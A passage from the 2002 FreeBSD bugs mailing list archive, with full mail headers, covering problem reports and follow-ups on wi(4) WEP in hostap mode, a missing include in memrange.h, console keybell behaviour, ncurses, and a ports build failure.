Pandya wrote: > Could you please try the patch, which is available at: > http://www.unixdaemons.com/~hiten/work/msdosfs_vfsops.patch I dont have the problem right now (with the patched kernel) but I don't see "Next free cluster in FSInfo..." on the console (that should happen if I read the patch correct) so I don't think I have the problem on the filesystem right now. I have used the parition from Windows 2000 in the meantime so that could have "fixed" the problem temporarily. I will try to run an unpatched kernel and "hope" that the kernel panics returns and then test your patch. -- Simon L. Nielsen To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 19:30:12 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6D44737B400 for ; Tue, 20 Aug 2002 19:30:02 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id A9B8A43E77 for ; Tue, 20 Aug 2002 19:30:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7L2U1JU048900 for ; Tue, 20 Aug 2002 19:30:01 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7L2U1j7048899; Tue, 20 Aug 2002 19:30:01 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3D4A237B400 for ; Tue, 20 Aug 2002 19:24:56 -0700 (PDT) Received: from gnbfw.bond.wattle.id.au (CPE-203-45-32-179.vic.bigpond.net.au [203.45.32.179]) by mx1.FreeBSD.org (Postfix) with ESMTP id 94C4743E42 for ; Tue, 20 Aug 2002 19:24:54 -0700 (PDT) (envelope-from toor@gnbfw.bond.wattle.id.au) Received: from gnbfw.bond.wattle.id.au (smmsp@localhost.bond.wattle.id.au [127.0.0.1]) by gnbfw.bond.wattle.id.au (8.12.5/8.12.5) with ESMTP id g7L2Oq8r068298 for ; Wed, 21 Aug 2002 12:24:52 +1000 (EST) (envelope-from toor@gnbfw.bond.wattle.id.au) Received: (from root@localhost) by gnbfw.bond.wattle.id.au (8.12.5/8.12.5/Submit) id g7L2Oocv068297; Wed, 21 Aug 2002 12:24:50 +1000 (EST) Message-Id: <200208210224.g7L2Oocv068297@gnbfw.bond.wattle.id.au> Date: Wed, 21 Aug 2002 12:24:50 +1000 (EST) From: Gregory Bond To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: kern/41834: wi(4) hostap mode won't work with WEP Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41834 >Category: kern >Synopsis: wi(4) hostap mode won't work with WEP >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Aug 20 19:30:00 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Gregory Bond >Release: FreeBSD 4.6-STABLE i386 >Organization: ITG Australia Ltd >Environment: System: FreeBSD gnbfw.bond.wattle.id.au 4.6-STABLE FreeBSD 4.6-STABLE #3: Sat Jul 20 16:45:58 EST 2002 root@gregbsd.bond.wattle.id.au:/usr/obj/usr/src/sys/FW i386 Ancient Pentium-100 box acting as a firewall. wi(4) running on a DLink 520 Client is a WinMe laptop with a DLink 650 wi0: mem 0xfbfe0000-0xfbfe0fff irq 11 at device 12.0 on pci0 wi0: 802.11 address: 00:05:5d:5b:c4:c8 wi0: using RF:PRISM2.5 MAC:ISL3874A(Mini-PCI) wi0: Intersil Firmware: Primary 1.00.05, Station 1.03.04 >Description: Using the wi(4) driver in ad-hoc mode, I can enable WEP on both ends and it works fine. In hostap mode, and without WEP, it works fine. In hostap mode with WEP enabled, the laptop cannot get an association. As soon as I turn WEP off on both ends, the laptop can get an association. I'm using Hex keys, and even simple unambiguous keys (like 0x11111...). I've tried 64 and 128 bit WEP. I've asked about this in the -stable list, and gotten a couple of "me too"s from people with other wireless cards, but no answers. So I don't think it's necessarily a case of user error. (Yes, I know WEP is not much chop but it's good enough to stop casual leeching of my cable link.) [Severity is Serious/medium because it is very unwise to run wireless without some sort of security.] As an aside, I can't go from hostap mode back to ad-hoc mode without a reboot, it gets ENXIO. Looking at if_wi.c, something like this appears to be deliberate (in wi_media_change(), line 2846ff), but I think the ENXIO is coming from sys/net/if_media.c:ifmedia_ioctl(), due to ifmedia_match() failing, which is very very odd..... >How-To-Repeat: # ifconfig wi0 inet netmask ssid wepkey (Put laptop in Ad-Hoc mode with same key) Note that the link works. # ifconfig wi0 wepkey mediaopt hostap (Put laptop in BSS mode) Note failure to get an association. # ifconfig wi0 -wep (And turn WEP off on the laptopo) Note the laptop is able to associate. # ifconfig wi0 mediaopt adhoc ifconfig: SIOCSIFMEDIA: Device not configured # >Fix: None known. Possible work-around is to use IPSEC or PPPoE for network security. I'm willing to play around with this box if anyone can give me some pointers or wants me to try some debugging. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 21:20:12 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1DBFC37B401 for ; Tue, 20 Aug 2002 21:20:08 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1F91243E4A for ; Tue, 20 Aug 2002 21:20:07 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7L4K1JU077222 for ; Tue, 20 Aug 2002 21:20:01 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7L4K1AQ077221; Tue, 20 Aug 2002 21:20:01 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3043837B400 for ; Tue, 20 Aug 2002 21:18:20 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id DA55043E42 for ; Tue, 20 Aug 2002 21:18:19 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g7L4IJOT003792 for ; Tue, 20 Aug 2002 21:18:19 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g7L4IJxI003791; Tue, 20 Aug 2002 21:18:19 -0700 (PDT) Message-Id: <200208210418.g7L4IJxI003791@www.freebsd.org> Date: Tue, 20 Aug 2002 21:18:19 -0700 (PDT) From: Andrew.P.Lentvorski@FreeBSD.org, "Jr." To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: kern/41835: memrange.h uses u_int64_t but does not include the file which has the definition Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41835 >Category: kern >Synopsis: memrange.h uses u_int64_t but does not include the file which has the definition >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Aug 20 21:20:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Andrew P. Lentvorski, Jr. >Release: 4.6.2-RELEASE >Organization: >Environment: FreeBSD taz.allcaps.org 4.6.2-RELEASE FreeBSD 4.6.2-RELEASE #0: Tue Aug 20 20:56:33 PDT 2002 root@taz.allcaps.org:/usr/obj/usr/src/sys/GENERIC i386 >Description: The file /usr/include/sys/memrange.h has structure members of u_int64_t but does not include the file in which they are defined. >How-To-Repeat: Compile anything which only includes memrange.h but not the appropriate types. This popped up when trying to compile the latest version of XFree86 from CVS. Error message: LD_LIBRARY_PATH=../../../../../../exports/lib cc -c -O2 -ansi -pedantic -Dasm=__asm -Wall -Wpointer-arith -Wstrict-prototypes -Wmissing-prototypes -Wmissing-declarations -Wredundant-decls -Wnested-externs -Wundef -I../../../../../../programs/Xserver/hw/xfree86/common -I../../../../../../programs/Xserver/hw/xfree86/os-support -I. -I../../../../../../programs/Xserver/include -I../../../../../../exports/include/X11 -I../../../../../../include/extensions -I../../../../../../programs/Xserver/mi -I../../../../../../programs/Xserver/hw/xfree86/os-support/shared -I../../../../../.. -I../../../../../../exports/include -I/usr/X11R6/include -DCSRG_BASED -DSHAPE -DXINPUT -DXKB -DLBX -DXAPPGROUP -DXCSECURITY -DTOGCUP -DXF86BIGFONT -DDPMSExtension -DPIXPRIV -DPANORAMIX -DRENDER -DGCCUSESGAS -DAVOID_GLYPHBLT -DPIXPRIV -DSINGLEDEPTH -DXFreeXDGA -DXvExtension -DXFree86LOADER -DXFree86Server -DXF86VIDMODE -DXvMCExtension -DSMART_SCHEDULE -DBUILDDEBUG -DXRes Extension -DX_BYTE_ORDER=X_LITTLE_ENDIAN -DNDEBUG -DFUNCPROTO=15 -DNARROWPROTO -DPCCONS_SUPPORT -DSYSCONS_SUPPORT -DPCVT_SUPPORT -DUSE_DEV_IO -DUSESTDRES -DHAS_MTRR_SUPPORT i386_video.c In file included from i386_video.c:35: /usr/include/sys/memrange.h:26: syntax error before `u_int64_t' >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 21:34:44 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2360B37B400 for ; Tue, 20 Aug 2002 21:34:43 -0700 (PDT) Received: from bspu.ab.ru (bspu.ab.ru [212.94.100.242]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8E21A43E72 for ; Tue, 20 Aug 2002 21:34:40 -0700 (PDT) (envelope-from swp@uni-altai.ru) Received: from bspu.secna.ru (root@gw-bspu-astu-2M.bspu.secna.ru [212.192.2.1]) by bspu.ab.ru (8.11.0/8.11.0) with ESMTP id g7L4YVh58598 for ; Wed, 21 Aug 2002 11:34:31 +0700 (NOVST) (envelope-from swp@uni-altai.ru) Received: from bspu.secna.ru (smmsp@localhost [127.0.0.1]) by bspu.secna.ru (8.12.3/8.12.3) with ESMTP id g7L4YTmX037806 for ; Wed, 21 Aug 2002 11:34:30 +0700 (NSS) Received: (from root@localhost) by bspu.secna.ru (8.12.3/8.12.3/Submit) id g7L4YTTv037805 for freebsd-bugs@freebsd.org; Wed, 21 Aug 2002 11:34:29 +0700 (NOVST) (envelope-from swp) Date: Wed, 21 Aug 2002 11:34:29 +0700 From: "mitrohin a.s." To: freebsd-bugs@freebsd.org Subject: boot1.s Message-ID: <20020821113429.A37800@bspu.secna.ru> Reply-To: swp@uni-altai.ru Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.20i Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org helo. file /usr/src/sys/boot/i386/boot2/boot1.s, line 140 mov $part4,%si # Partition what %dl have value? i don`t seen initialization for %dl/%dx. bug? cmpb $0x80,%dl # Hard drive? jb main.4 # No /swp To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Aug 20 22:24:22 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id DEB2A37B400; Tue, 20 Aug 2002 22:24:20 -0700 (PDT) Received: from 126.216-123-229-0.interbaun.com (126.216-123-229-0.interbaun.com [216.123.229.126]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3EFB343E70; Tue, 20 Aug 2002 22:24:19 -0700 (PDT) (envelope-from soralx@cydem.zp.ua) Received: from there (localhost [127.0.0.1]) by 126.216-123-229-0.interbaun.com (8.11.6/8.11.6) with SMTP id g7L5O6U08098; Tue, 20 Aug 2002 23:24:08 -0600 (MDT) (envelope-from soralx@cydem.zp.ua) Message-Id: <200208210524.g7L5O6U08098@126.216-123-229-0.interbaun.com> Content-Type: text/plain; charset="koi8-r" From: To: schweikh@FreeBSD.org Subject: Re: misc/41772: can't disable keybell Date: Tue, 20 Aug 2002 23:24:05 -0600 X-Mailer: KMail [version 1.3.2] References: <200208201459.g7KEx5gF037351@freefall.freebsd.org> In-Reply-To: <200208201459.g7KEx5gF037351@freefall.freebsd.org> Cc: freebsd-bugs@FreeBSD.org MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > Synopsis: can't disable keybell > The proper way to turn off the bell is keybell=off in rc.conf. that's right, I tried this first in '/etc/defaults/rc.conf' it's 'keybell=NO' Well, that doesn't really matter - it's all the same and is not working properly for me 8) > If you do this on the command line, you need to redirect the tty, > kbdcontrol -b off < /dev/tty does the same thing, as supposed to > does the trick for me on 4-STABLE. as I remember, in RELEASE-2.2.7 it worked fine (or it just was because of a different machine), and as I moved to FreeBSD-4.?.?, it never works for me > Please confirm if it works for you as well. not as I expect it to work I expect the beeper to be absolutely quiet, but it just sets the frequency low (about 30Hz) As I understand it: when the 'keybell=off' is used, and terminal recieves 07h, the kernel shouldn't touch the timer and send anything to port 61h, but it [sets the timer(I can hear some sounds) and OUTs to the port?] I'll check '/usr/src/sys/isa/syscons_isa.c' (right?) for how it actually works [and will learn some more C :)] > PS: This is more appropriately asked on questions@ mailing > list than in a PR. well, I thought I tested it enough to report a PR 20.08.2002; 22:32:57 [SorAlx] http://cydem.zp.ua/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Aug 21 0:54:27 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id AF75637B401; Wed, 21 Aug 2002 00:54:25 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5D65243E42; Wed, 21 Aug 2002 00:54:25 -0700 (PDT) (envelope-from schweikh@FreeBSD.org) Received: from freefall.freebsd.org (schweikh@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7L7sPJU031846; Wed, 21 Aug 2002 00:54:25 -0700 (PDT) (envelope-from schweikh@freefall.freebsd.org) Received: (from schweikh@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7L7rG1F031797; Wed, 21 Aug 2002 00:53:16 -0700 (PDT) Date: Wed, 21 Aug 2002 00:53:16 -0700 (PDT) From: Jens Schweikhardt Message-Id: <200208210753.g7L7rG1F031797@freefall.freebsd.org> To: cjuniet@entreview.com, schweikh@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/41819: [PATCH] Typo in share/syscons/fonts/INDEX.fonts Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: [PATCH] Typo in share/syscons/fonts/INDEX.fonts State-Changed-From-To: open->closed State-Changed-By: schweikh State-Changed-When: Wed Aug 21 00:52:03 PDT 2002 State-Changed-Why: Fixed in rev 1.25 in -current. MFC in 3 days. Thanks Christophe! http://www.freebsd.org/cgi/query-pr.cgi?pr=41819 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Aug 21 1:25:47 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 804BE37B400; Wed, 21 Aug 2002 01:25:46 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2EBE943E4A; Wed, 21 Aug 2002 01:25:46 -0700 (PDT) (envelope-from schweikh@FreeBSD.org) Received: from freefall.freebsd.org (schweikh@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7L8PkJU042712; Wed, 21 Aug 2002 01:25:46 -0700 (PDT) (envelope-from schweikh@freefall.freebsd.org) Received: (from schweikh@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7L8PjM8042708; Wed, 21 Aug 2002 01:25:45 -0700 (PDT) Date: Wed, 21 Aug 2002 01:25:45 -0700 (PDT) From: Jens Schweikhardt Message-Id: <200208210825.g7L8PjM8042708@freefall.freebsd.org> To: eikemeier@fillmore-labs.com, schweikh@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/40185: FreeBSD does not work with the nVidia nForce chipset on an ASUS A7N266-E motherboard Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: FreeBSD does not work with the nVidia nForce chipset on an ASUS A7N266-E motherboard State-Changed-From-To: open->closed State-Changed-By: schweikh State-Changed-When: Wed Aug 21 01:24:54 PDT 2002 State-Changed-Why: Duplicate of 40193 (which looks more sane, e.g. it has a valid Originator with email address). http://www.freebsd.org/cgi/query-pr.cgi?pr=40185 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Aug 21 1:27:27 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BD5AE37B401; Wed, 21 Aug 2002 01:27:25 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6E41B43E42; Wed, 21 Aug 2002 01:27:25 -0700 (PDT) (envelope-from schweikh@FreeBSD.org) Received: from freefall.freebsd.org (schweikh@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7L8RPJU042826; Wed, 21 Aug 2002 01:27:25 -0700 (PDT) (envelope-from schweikh@freefall.freebsd.org) Received: (from schweikh@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7L8RPPD042822; Wed, 21 Aug 2002 01:27:25 -0700 (PDT) Date: Wed, 21 Aug 2002 01:27:25 -0700 (PDT) From: Jens Schweikhardt Message-Id: <200208210827.g7L8RPPD042822@freefall.freebsd.org> To: schweikh@FreeBSD.org, freebsd-bugs@FreeBSD.org, grog@FreeBSD.org Subject: Re: misc/40001: vinum showing -2 drives after removing several stale objects Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: vinum showing -2 drives after removing several stale objects Responsible-Changed-From-To: freebsd-bugs->grog Responsible-Changed-By: schweikh Responsible-Changed-When: Wed Aug 21 01:27:03 PDT 2002 Responsible-Changed-Why: Over to vinum maintainer. http://www.freebsd.org/cgi/query-pr.cgi?pr=40001 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Aug 21 2:20:15 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id ABCBE37B400 for ; Wed, 21 Aug 2002 02:20:07 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4BB1C43E3B for ; Wed, 21 Aug 2002 02:20:07 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7L9K3JU057116 for ; Wed, 21 Aug 2002 02:20:03 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7L9K3he057114; Wed, 21 Aug 2002 02:20:03 -0700 (PDT) Date: Wed, 21 Aug 2002 02:20:03 -0700 (PDT) Message-Id: <200208210920.g7L9K3he057114@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Jens Schweikhardt Subject: Re: misc/41772: can't disable keybell Reply-To: Jens Schweikhardt Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR misc/41772; it has been noted by GNATS. From: Jens Schweikhardt To: soralx@cydem.zp.ua Cc: GNATS Bug Followup Subject: Re: misc/41772: can't disable keybell Date: Wed, 21 Aug 2002 11:03:57 +0200 [Please Cc: answers to bug-followup@freebsd.org with the subject intact] On Tue, Aug 20, 2002 at 11:24:05PM -0600, soralx@cydem.zp.ua wrote: # > Synopsis: can't disable keybell # # > The proper way to turn off the bell is keybell=off in rc.conf. # that's right, I tried this first # in '/etc/defaults/rc.conf' it's 'keybell=NO' Just to make my statement clear: keybell=NO means "Do not run any kbdcontrol -b command at boot time" it does NOT mean to turn it off. keybell=off means "Run kbdcontrol -b off" at boot time. # Well, that doesn't really matter - it's all the same and is not # working properly for me 8) # # > If you do this on the command line, you need to redirect the tty, # > kbdcontrol -b off < /dev/tty # does the same thing, as supposed to # # > does the trick for me on 4-STABLE. # as I remember, in RELEASE-2.2.7 it worked fine (or it just was # because of a different machine), and as I moved to FreeBSD-4.?.?, # it never works for me # # > Please confirm if it works for you as well. # not as I expect it to work So you have keybell=off in /etc/rc.conf and it does the following: # I expect the beeper to be absolutely quiet, but it just sets the # frequency low (about 30Hz) Hmm. I've got seven disks and a bunch of fans in my case, so I'll never hear anything that low and short. # As I understand it: when the 'keybell=off' is used, and terminal # recieves 07h, the kernel shouldn't touch the timer and send anything # to port 61h, but it [sets the timer(I can hear some # sounds) and OUTs to the port?] # # I'll check '/usr/src/sys/isa/syscons_isa.c' (right?) for how it actually works # [and will learn some more C :)] Try to understand what kbdcontrol does. It writes an escape sequence to the stderr stream which you can capture with (bourne shell, not csh) $ kbdcontrol -b off 2>esc $ od -bc esc 0000000 033 133 075 060 073 060 102 033 [ = 0 ; 0 B 0000007 Investigate how the syscons driver interprets this escape sequence and you should be on the right track. Good luck! # > PS: This is more appropriately asked on questions@ mailing # > list than in a PR. # well, I thought I tested it enough to report a PR Well, if you had given all that extra information about using keybell=off and 30Hz stuff... better give too much details that too little. We can always ignore what is not relevant, but if something relevant is missing like in your case, we are guided in the wrong direction. Regards, Jens -- Jens Schweikhardt http://www.schweikhardt.net/ SIGSIG -- signature too long (core dumped) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Aug 21 2:50:10 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6022C37B400 for ; Wed, 21 Aug 2002 02:50:05 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 245B543E6E for ; Wed, 21 Aug 2002 02:50:05 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7L9o3JU063342 for ; Wed, 21 Aug 2002 02:50:03 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7L9o3RE063341; Wed, 21 Aug 2002 02:50:03 -0700 (PDT) Date: Wed, 21 Aug 2002 02:50:03 -0700 (PDT) Message-Id: <200208210950.g7L9o3RE063341@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Valentin Nechayev Subject: Re: gnu/23058: ncurses: tgoto_internal() ugliness Reply-To: Valentin Nechayev Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR gnu/23058; it has been noted by GNATS. From: Valentin Nechayev To: Ian Dowse Cc: freebsd-gnats-submit@FreeBSD.org Subject: Re: gnu/23058: ncurses: tgoto_internal() ugliness Date: Wed, 21 Aug 2002 12:43:13 +0300 Sun, Aug 11, 2002 at 14:51:37, iedowse wrote about "Re: gnu/23058: ncurses: tgoto_internal() ugliness": > Synopsis: ncurses: tgoto_internal() ugliness > > State-Changed-From-To: open->feedback > State-Changed-By: iedowse > State-Changed-When: Sun Aug 11 14:51:15 PDT 2002 > State-Changed-Why: > > Is this bug still present? Yes, the code wasn't changed since bug detection and in case of empty string allocation isn't called. But now I don't know how it can be trigged (screen is now fixed in this place due to parallel PR and following upgrades and I didn't see another reports). /netch To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Aug 21 3:14: 7 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4596837B400 for ; Wed, 21 Aug 2002 03:14:03 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9D84C43E72 for ; Wed, 21 Aug 2002 03:12:42 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7LABMJU071202 for ; Wed, 21 Aug 2002 03:11:22 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7LABM1R071201; Wed, 21 Aug 2002 03:11:22 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4BEA937B4DF for ; Wed, 21 Aug 2002 03:00:37 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id EC82543E42 for ; Wed, 21 Aug 2002 02:59:16 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g7L9vuOT044240 for ; Wed, 21 Aug 2002 02:57:56 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g7L9vuOJ044239; Wed, 21 Aug 2002 02:57:56 -0700 (PDT) Message-Id: <200208210957.g7L9vuOJ044239@www.freebsd.org> Date: Wed, 21 Aug 2002 02:57:56 -0700 (PDT) From: Bigfish To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/41840: mc-4.5.55_3 make problem... Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41840 >Category: misc >Synopsis: mc-4.5.55_3 make problem... >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Wed Aug 21 03:10:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Bigfish >Release: 4.6-RELEASE >Organization: GC >Environment: FreeBSD gc.shu.edu.tw 4.6-RELEASE FreeBSD 4.6-RELEASE #0: Wed Jul 3 17:09:11 CS T 2002 root@gc.shu.edu.tw:/usr/src/sys/compile/GC i386 >Description: When I try to make mc-4.5.55_3, it appears some errors below: >How-To-Repeat: cd /usr/ports/misc/mc; make clean; make >Fix: Sorry, I don't know... >Release-Note: >Audit-Trail: >Unformatted: >> Checksum OK for mc-4.5.55.tar.gz. ===> mc-4.5.55_3 depends on executable: ispell - found ===> mc-4.5.55_3 depends on executable: gmake - found ===> mc-4.5.55_3 depends on file: 